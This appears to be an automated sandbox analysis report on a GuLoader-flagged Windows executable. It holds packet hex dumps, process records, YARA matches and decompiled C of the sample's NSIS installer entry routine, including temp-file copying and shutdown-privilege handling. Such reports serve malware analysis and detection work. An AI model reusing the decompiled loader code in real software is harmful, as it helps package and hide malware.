Jun 1, 2023 22:35:35.535090923 CEST	75	IN	Data Raw: 30 96 dc 0c 34 bd 35 d7 76 cf d8 d9 54 f6 35 4b 52 93 39 e1 8f 75 52 7e c4 c1 12 c4 b7 1f 91 6a 07 37 0c 7f 1c 66 6c c9 87 99 53 d2 1e 21 08 9c 51 97 19 a9 f7 35 37 e8 cf 7e 07 97 7f 4c c4 d5 f1 bd 48 73 69 74 d2 5a 6c 03 d8 3b 3a 28 db 9d f9 6f Data Ascii: 045vT5KR9uR~j7flS!Q57~LHsitZl;:(ouC"X+hzU{dw6fu>ewF,bv\|&)0fX4b3m0X,9&W\A?`'JlnI]:B+DJ^yS+q-{D
Jun 1, 2023 22:35:35.535103083 CEST	77	IN	Data Raw: d8 ab 92 e2 a3 76 b9 ab 8f c7 e6 e9 a3 81 b3 2e 6f 82 bc 7e 1d 47 31 57 76 44 2c 02 2d d4 91 a4 14 6e bf 21 b9 0a 85 41 14 5a a9 4b 16 dc 13 24 d3 41 0c cc 65 60 f5 60 ad d7 3e ac 16 a6 3c e7 9e ec cf ca 2d f6 17 f5 f4 fe 22 68 ef ab 83 dc b2 76 Data Ascii: v.o~G1WvD,-n!AZK$Ae``><-"hvJ't/DaCT>SmQGR37;X:%"jEl5}3+zm>-k?'PL%A3C20a]NB0<Za}yucU_qD1
Jun 1, 2023 22:35:35.535114050 CEST	78	IN	Data Raw: 45 f4 b3 e4 a1 77 f0 1e 85 5f f7 d6 a3 12 c2 15 26 e6 f8 f5 23 7e 5b 20 28 0c 05 15 64 b7 5b 50 84 d2 b9 9d 2f 0e 09 aa c5 30 7c bc 45 b8 99 0d 17 90 0b 65 6c eb 36 cb 33 d9 7b 37 3e 6f 06 a0 87 59 55 7c 4c 7c 32 26 75 c3 5e 58 7f 9e c2 e9 42 bb Data Ascii: Ew_&#~[ (d[P/0\|Eel63{7>oYU\|L\|2&u^XB(tfa)$[iW\|o9EpR9hC\FP`X'j+v6<7{u,b\(CE~<4O,,o+>lUbuW%K8PJ.BBh
Jun 1, 2023 22:35:35.535125971 CEST	79	IN	Data Raw: 6c 33 fa b4 c3 d0 02 55 ad 8d d3 38 b4 cf a9 fc 7b b2 d5 d6 8c 6a f8 c8 fa c6 50 60 5b 2a 31 ee 48 12 f7 a5 e8 f5 55 20 30 73 07 04 68 85 f8 83 b5 81 86 5a 0a 7e b5 7d b5 64 86 eb 65 6b 6f c0 30 a4 df d3 c1 6b 65 10 c3 19 f9 85 c4 bf 87 6d 15 26 Data Ascii: l3U8{jP`[1HU 0shZ~}deko0kem&+DPtg/7hqk2%_sd(M.Pe%z!B/Fyc5F=s:k0();z!DIlWAtu6Ej9I`
Jun 1, 2023 22:35:35.695092916 CEST	81	IN	Data Raw: dc 0d 88 f0 e0 d6 aa 01 6b 5d eb 85 bb 69 ea 5d 83 35 eb 7e 17 0e be ea f9 3a 89 b9 97 a7 71 bc 51 a8 61 7e a4 c7 73 da bb ce 14 ef d0 a0 41 a1 96 d4 40 90 ad 14 36 f5 27 5e ff f6 49 f4 88 5a 19 7e 47 c6 e0 5e fb 03 00 dd be e6 87 a4 4a 78 1e 41 Data Ascii: k]i]5~:qQa~sA@6'^IZ~G^JxAGgOlPv]B@\|!hG#xJF/X?zBWcOnqu0V35+!!e_;9/$0ssrbW,{/id'^%^P Q:$h*z

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: 64Tgzu2FKh.exePID: 11260, Parent PID: 5432

General

Target ID:	0
Start time:	22:34:32
Start date:	01/06/2023
Path:	C:\Users\user\Desktop\64Tgzu2FKh.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\64Tgzu2FKh.exe
Imagebase:	0x400000
File size:	344681 bytes
MD5 hash:	9DCA43CB15D97693D2DE73683804C5C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1536218122.0000000008A31000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: 64Tgzu2FKh.exePID: 4832, Parent PID: 11260

General

Target ID:	11
Start time:	22:35:28
Start date:	01/06/2023
Path:	C:\Users\user\Desktop\64Tgzu2FKh.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\64Tgzu2FKh.exe
Imagebase:	0x400000
File size:	344681 bytes
MD5 hash:	9DCA43CB15D97693D2DE73683804C5C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000B.00000003.2050058689.00000000000E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: certreq.exePID: 9536, Parent PID: 5432

General

Target ID:	12
Start time:	22:36:38
Start date:	01/06/2023
Path:	C:\Windows\System32\certreq.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\certreq.exe
Imagebase:	0x7ff7f37a0000
File size:	564224 bytes
MD5 hash:	9E5EA30E8DF2A24833FDB9F2D673C41A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 9616, Parent PID: 9536

General

Target ID:	13
Start time:	22:36:38
Start date:	01/06/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6652c0000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 10068, Parent PID: 4832

General

Target ID:	16
Start time:	22:36:43
Start date:	01/06/2023
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4832 -s 1232
Imagebase:	0x610000
File size:	482640 bytes
MD5 hash:	40A149513D721F096DDF50C04DA2F01F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: 64Tgzu2FKh.exePID: 11260, Parent PID: 5432COMMON

Execution Graph

Execution Coverage:	20.6%
Dynamic/Decrypted Code Coverage:	13.3%
Signature Coverage:	19.7%
Total number of Nodes:	1575
Total number of Limit Nodes:	44

Executed Functions

Function 0040333D Relevance: 87.9, APIs: 33, Strings: 17, Instructions: 412
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			_entry_() {
				signed int _t51;
				intOrPtr* _t56;
				WCHAR* _t60;
				char* _t63;
				void* _t66;
				void* _t68;
				int _t70;
				int _t72;
				int _t75;
				intOrPtr* _t76;
				int _t77;
				int _t79;
				void* _t103;
				signed int _t120;
				void* _t123;
				void* _t128;
				intOrPtr _t147;
				intOrPtr _t148;
				intOrPtr* _t149;
				int _t151;
				void* _t154;
				int _t155;
				signed int _t159;
				signed int _t164;
				signed int _t169;
				void* _t171;
				WCHAR* _t172;
				signed int _t175;
				signed int _t178;
				CHAR* _t179;
				void* _t182;
				int* _t184;
				void* _t192;
				char* _t193;
				void* _t196;
				void* _t197;
				void* _t243;

				_t171 = 0x20;
				_t151 = 0;
				 *(_t197 + 0x14) = 0;
				 *(_t197 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t197 + 0x1c) = 0;
				SetErrorMode(0x8001); // executed
				_t51 = GetVersion() & 0xbfffffff;
				 *0x42a20c = _t51;
				if(_t51 != 6) {
					_t149 = E00406626(0);
					if(_t149 != 0) {
						 *_t149(0xc00);
					}
				}
				_t179 = "UXTHEME";
				goto L4;
				L8:
				__imp__#17(_t192);
				__imp__OleInitialize(_t151); // executed
				 *0x42a2d8 = _t56;
				SHGetFileInfoW(0x4216a8, _t151, _t197 + 0x34, 0x2b4, _t151); // executed
				E0040624C(0x429200, L"NSIS Error");
				_t60 = GetCommandLineW();
				_t193 = L"\"C:\\Users\\Arthur\\Desktop\\64Tgzu2FKh.exe\"";
				E0040624C(_t193, _t60);
				 *0x42a200 = GetModuleHandleW(_t151);
				_t63 = _t193;
				if(L"\"C:\\Users\\Arthur\\Desktop\\64Tgzu2FKh.exe\"" == 0x22) {
					_t63 =  &M00435002;
					_t171 = 0x22;
				}
				_t155 = CharNextW(E00405B4A(_t63, _t171));
				 *(_t197 + 0x18) = _t155;
				_t66 =  *_t155;
				if(_t66 == _t151) {
					L33:
					_t172 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
					GetTempPathW(0x400, _t172);
					_t68 = E0040330C(_t155, 0);
					_t225 = _t68;
					if(_t68 != 0) {
						L36:
						DeleteFileW(L"1033"); // executed
						_t70 = E00402EC1(_t227,  *(_t197 + 0x1c)); // executed
						 *(_t197 + 0x10) = _t70;
						if(_t70 != _t151) {
							L48:
							E00403880();
							__imp__OleUninitialize();
							_t239 =  *(_t197 + 0x10) - _t151;
							if( *(_t197 + 0x10) == _t151) {
								__eflags =  *0x42a2b4 - _t151;
								if( *0x42a2b4 == _t151) {
									L72:
									_t72 =  *0x42a2cc;
									__eflags = _t72 - 0xffffffff;
									if(_t72 != 0xffffffff) {
										 *(_t197 + 0x10) = _t72;
									}
									ExitProcess( *(_t197 + 0x10));
								}
								_t75 = OpenProcessToken(GetCurrentProcess(), 0x28, _t197 + 0x14);
								__eflags = _t75;
								if(_t75 != 0) {
									LookupPrivilegeValueW(_t151, L"SeShutdownPrivilege", _t197 + 0x20);
									 *(_t197 + 0x34) = 1;
									 *(_t197 + 0x40) = 2;
									AdjustTokenPrivileges( *(_t197 + 0x28), _t151, _t197 + 0x24, _t151, _t151, _t151);
								}
								_t76 = E00406626(4);
								__eflags = _t76 - _t151;
								if(_t76 == _t151) {
									L70:
									_t77 = ExitWindowsEx(2, 0x80040002);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L72;
									}
									goto L71;
								} else {
									_t79 =  *_t76(_t151, _t151, _t151, 0x25, 0x80040002);
									__eflags = _t79;
									if(_t79 == 0) {
										L71:
										E0040140B(9);
										goto L72;
									}
									goto L70;
								}
							}
							E004058AE( *(_t197 + 0x10), 0x200010);
							ExitProcess(2);
						}
						if( *0x42a220 == _t151) {
							L47:
							 *0x42a2cc =  *0x42a2cc | 0xffffffff;
							 *(_t197 + 0x14) = E0040395A( *0x42a2cc);
							goto L48;
						}
						_t184 = E00405B4A(_t193, _t151);
						if(_t184 < _t193) {
							L44:
							_t236 = _t184 - _t193;
							 *(_t197 + 0x10) = L"Error launching installer";
							if(_t184 < _t193) {
								_t182 = E00405819(_t239);
								lstrcatW(_t172, L"~nsu");
								if(_t182 != _t151) {
									lstrcatW(_t172, "A");
								}
								lstrcatW(_t172, L".tmp");
								_t195 = L"C:\\Users\\Arthur\\Desktop";
								if(lstrcmpiW(_t172, L"C:\\Users\\Arthur\\Desktop") != 0) {
									_push(_t172);
									if(_t182 == _t151) {
										E004057FC();
									} else {
										E0040577F();
									}
									SetCurrentDirectoryW(_t172);
									_t243 = L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth" - _t151; // 0x43
									if(_t243 == 0) {
										E0040624C(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth", _t195);
									}
									E0040624C(0x42b000,  *(_t197 + 0x18));
									_t156 = "A" & 0x0000ffff;
									 *0x42b800 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
									_t196 = 0x1a;
									do {
										E0040626E(_t151, _t172, 0x420ea8, 0x420ea8,  *((intOrPtr*)( *0x42a214 + 0x120)));
										DeleteFileW(0x420ea8);
										if( *(_t197 + 0x10) != _t151 && CopyFileW(L"C:\\Users\\Arthur\\Desktop\\64Tgzu2FKh.exe", 0x420ea8, 1) != 0) {
											E00406012(_t156, 0x420ea8, _t151);
											E0040626E(_t151, _t172, 0x420ea8, 0x420ea8,  *((intOrPtr*)( *0x42a214 + 0x124)));
											_t103 = E00405831(0x420ea8);
											if(_t103 != _t151) {
												CloseHandle(_t103);
												 *(_t197 + 0x10) = _t151;
											}
										}
										 *0x42b800 =  *0x42b800 + 1;
										_t196 = _t196 - 1;
									} while (_t196 != 0);
									E00406012(_t156, _t172, _t151);
								}
								goto L48;
							}
							 *_t184 = _t151;
							_t185 =  &(_t184[2]);
							if(E00405C25(_t236,  &(_t184[2])) == 0) {
								goto L48;
							}
							E0040624C(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth", _t185);
							E0040624C(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth", _t185);
							 *(_t197 + 0x10) = _t151;
							goto L47;
						}
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_t159 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
						_t120 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t164 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
						while( *_t184 != _t159 || _t184[1] != _t120) {
							_t184 = _t184;
							if(_t184 >= _t193) {
								continue;
							}
							break;
						}
						_t151 = 0;
						goto L44;
					}
					GetWindowsDirectoryW(_t172, 0x3fb);
					lstrcatW(_t172, L"\\Temp");
					_t123 = E0040330C(_t155, _t225);
					_t226 = _t123;
					if(_t123 != 0) {
						goto L36;
					}
					GetTempPathW(0x3fc, _t172);
					lstrcatW(_t172, L"Low");
					SetEnvironmentVariableW(L"TEMP", _t172);
					SetEnvironmentVariableW(L"TMP", _t172);
					_t128 = E0040330C(_t155, _t226);
					_t227 = _t128;
					if(_t128 == 0) {
						goto L48;
					}
					goto L36;
				} else {
					do {
						_t154 = 0x20;
						if(_t66 != _t154) {
							L13:
							if( *_t155 == 0x22) {
								_t155 = _t155 + 2;
								_t154 = 0x22;
							}
							if( *_t155 != 0x2f) {
								goto L27;
							} else {
								_t155 = _t155 + 2;
								if( *_t155 == 0x53) {
									_t148 =  *((intOrPtr*)(_t155 + 2));
									if(_t148 == 0x20 || _t148 == 0) {
										 *0x42a2c0 = 1;
									}
								}
								asm("cdq");
								asm("cdq");
								_t169 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t175 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t169;
								if( *_t155 == (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t169) &&  *((intOrPtr*)(_t155 + 4)) == _t175) {
									_t147 =  *((intOrPtr*)(_t155 + 8));
									if(_t147 == 0x20 || _t147 == 0) {
										 *(_t197 + 0x1c) =  *(_t197 + 0x1c) | 0x00000004;
									}
								}
								asm("cdq");
								asm("cdq");
								_t164 = L" /D=" & 0x0000ffff;
								asm("cdq");
								_t178 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t164;
								if( *(_t155 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t164) ||  *_t155 != _t178) {
									goto L27;
								} else {
									 *(_t155 - 4) =  *(_t155 - 4) & 0x00000000;
									__eflags = _t155;
									E0040624C(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\spilplatform\\Thenceforth", _t155);
									L32:
									_t151 = 0;
									goto L33;
								}
							}
						} else {
							goto L12;
						}
						do {
							L12:
							_t155 = _t155 + 2;
						} while ( *_t155 == _t154);
						goto L13;
						L27:
						_t155 = E00405B4A(_t155, _t154);
						if( *_t155 == 0x22) {
							_t155 = _t155 + 2;
						}
						_t66 =  *_t155;
					} while (_t66 != 0);
					goto L32;
				}
				L4:
				E004065B6(_t179); // executed
				_t179 =  &(_t179[lstrlenA(_t179) + 1]);
				if( *_t179 != 0) {
					goto L4;
				} else {
					E00406626(0xa);
					 *0x42a204 = E00406626(8);
					_t56 = E00406626(6);
					if(_t56 != _t151) {
						_t56 =  *_t56(0x1e);
						if(_t56 != 0) {
							 *0x42a20f =  *0x42a20f | 0x00000040;
						}
					}
					goto L8;
				}
			}

0x00403348
0x00403349
0x00403350
0x00403354
0x0040335c
0x00403360
0x0040336c
0x00403375
0x0040337a
0x0040337d
0x00403384
0x0040338b
0x0040338b
0x00403384
0x0040338d
0x0040338d
0x004033d5
0x004033d6
0x004033dd
0x004033e3
0x004033f9
0x00403409
0x0040340e
0x00403414
0x0040341b
0x0040342f
0x00403434
0x00403436
0x0040343a
0x0040343f
0x0040343f
0x0040344e
0x00403450
0x00403454
0x0040345a
0x00403571
0x00403577
0x00403582
0x00403584
0x00403589
0x0040358b
0x004035e3
0x004035e8
0x004035f2
0x004035f9
0x004035fd
0x004036ae
0x004036ae
0x004036b3
0x004036b9
0x004036be
0x004037e4
0x004037ea
0x00403868
0x00403868
0x0040386d
0x00403870
0x00403872
0x00403872
0x0040387a
0x0040387a
0x004037fa
0x00403800
0x00403802
0x0040380f
0x00403822
0x0040382a
0x00403832
0x00403832
0x0040383a
0x0040383f
0x00403846
0x00403854
0x00403857
0x0040385d
0x0040385f
0x00000000
0x00000000
0x00000000
0x00403848
0x0040384e
0x00403850
0x00403852
0x00403861
0x00403863
0x00000000
0x00403863
0x00000000
0x00403852
0x00403846
0x004036cd
0x004036d4
0x004036d4
0x00403609
0x0040369e
0x0040369e
0x004036aa
0x00000000
0x004036aa
0x00403616
0x0040361a
0x00403668
0x00403668
0x0040366a
0x00403672
0x004036e5
0x004036e7
0x004036ee
0x004036f6
0x004036f6
0x00403701
0x00403706
0x00403715
0x00403719
0x0040371a
0x00403723
0x0040371c
0x0040371c
0x0040371c
0x00403729
0x0040372f
0x00403736
0x0040373e
0x0040373e
0x0040374c
0x00403758
0x00403766
0x0040376b
0x00403771
0x0040377d
0x00403783
0x0040378d
0x004037a3
0x004037b4
0x004037ba
0x004037c1
0x004037c4
0x004037ca
0x004037ca
0x004037c1
0x004037ce
0x004037d5
0x004037d5
0x004037da
0x004037da
0x00000000
0x00403715
0x00403674
0x00403677
0x00403682
0x00000000
0x00000000
0x0040368a
0x00403695
0x0040369a
0x00000000
0x0040369a
0x00403623
0x0040363b
0x0040364c
0x0040364d
0x00403651
0x00403653
0x00403661
0x00403664
0x00000000
0x00000000
0x00000000
0x00403664
0x00403666
0x00000000
0x00403666
0x00403593
0x0040359f
0x004035a4
0x004035a9
0x004035ab
0x00000000
0x00000000
0x004035b3
0x004035bb
0x004035cc
0x004035d4
0x004035d6
0x004035db
0x004035dd
0x00000000
0x00000000
0x00000000
0x00403460
0x00403460
0x00403462
0x00403466
0x0040346f
0x00403473
0x00403478
0x00403479
0x00403479
0x0040347e
0x00000000
0x00403484
0x00403485
0x0040348a
0x0040348c
0x00403494
0x0040349b
0x0040349b
0x00403494
0x004034ac
0x004034bf
0x004034c0
0x004034d5
0x004034da
0x004034de
0x004034e7
0x004034ef
0x004034f6
0x004034f6
0x004034ef
0x00403502
0x00403515
0x00403516
0x0040352b
0x00403531
0x00403535
0x00000000
0x0040355c
0x0040355c
0x00403561
0x0040356a
0x0040356f
0x0040356f
0x00000000
0x0040356f
0x00403535
0x00000000
0x00000000
0x00000000
0x00403468
0x00403468
0x00403469
0x0040346a
0x00000000
0x0040353d
0x00403544
0x0040354a
0x0040354d
0x0040354d
0x0040354e
0x00403551
0x00000000
0x0040355a
0x00403392
0x00403393
0x0040339f
0x004033a6
0x00000000
0x004033a8
0x004033aa
0x004033b8
0x004033bd
0x004033c4
0x004033c8
0x004033cc
0x004033ce
0x004033ce
0x004033cc
0x00000000
0x004033c4

APIs

SetErrorMode.KERNELBASE ref: 00403360
GetVersion.KERNEL32 ref: 00403366
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403399
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033D6
OleInitialize.OLE32(00000000), ref: 004033DD
SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 004033F9
GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040340E
GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\64Tgzu2FKh.exe",00000000,?,00000006,00000008,0000000A), ref: 00403421
CharNextW.USER32(00000000,"C:\Users\user\Desktop\64Tgzu2FKh.exe",00000020,?,00000006,00000008,0000000A), ref: 00403448

Part of subcall function 00406626: GetModuleHandleA.KERNEL32(?,00000020,?,004033AF,0000000A), ref: 00406638
Part of subcall function 00406626: GetProcAddress.KERNEL32(00000000,?), ref: 00406653

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403582
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403593
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040359F
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035B3
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004035BB
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035CC
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035D4
DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004035E8

Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259

OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036B3
ExitProcess.KERNEL32 ref: 004036D4
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 004036E7
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 004036F6
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403701
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\64Tgzu2FKh.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040370D
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403729
DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 00403783
CopyFileW.KERNEL32(C:\Users\user\Desktop\64Tgzu2FKh.exe,00420EA8,00000001,?,00000006,00000008,0000000A), ref: 00403797
CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037C4
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 004037F3
OpenProcessToken.ADVAPI32(00000000), ref: 004037FA
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040380F
AdjustTokenPrivileges.ADVAPI32 ref: 00403832
ExitWindowsEx.USER32(00000002,80040002), ref: 00403857
ExitProcess.KERNEL32 ref: 0040387A

Strings

C:\Users\user\Desktop, xrefs: 00403706, 0040370B, 00403738
TEMP, xrefs: 004035C7
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth, xrefs: 00403565, 00403685, 0040372F, 00403739
1033, xrefs: 004035E3
Error launching installer, xrefs: 0040366A
.tmp, xrefs: 004036FB
C:\Users\user\Desktop\64Tgzu2FKh.exe, xrefs: 00403792
TMP, xrefs: 004035CF
Low, xrefs: 004035B5
UXTHEME, xrefs: 0040338D, 00403392, 00403398
SeShutdownPrivilege, xrefs: 00403809
NSIS Error, xrefs: 004033FF
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth, xrefs: 00403690
C:\Users\user\AppData\Local\Temp\, xrefs: 00403577, 0040357C, 00403592, 0040359E, 004035AD, 004035BA, 004035C6, 004035CE, 004036E4, 004036F5, 00403700, 0040370C, 00403719, 00403728, 004037D9
\Temp, xrefs: 00403599
"C:\Users\user\Desktop\64Tgzu2FKh.exe", xrefs: 00403414, 0040341A, 00403610
~nsu, xrefs: 004036DF

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\user\Desktop\64Tgzu2FKh.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\spilplatform\Thenceforth$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\64Tgzu2FKh.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 2488574733-3293795733
Opcode ID: d2a13487a049f8695112171eabf7473e6d565728a0202d7647594f6489cd5a4d
Instruction ID: 8796dd7fda2277e74c31c2c32d36de8c434ed5469641edba7c3d6f01ab9f589a
Opcode Fuzzy Hash: d2a13487a049f8695112171eabf7473e6d565728a0202d7647594f6489cd5a4d
Instruction Fuzzy Hash: 8AD11470600310ABD7207F759D45B2B3AACEB4074AF10447EF881B62D1DB7E8956CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 004053EF Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E004053EF(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x4291e4;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E00405383, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						CloseHandle(_t127); // executed
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E0040626E(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
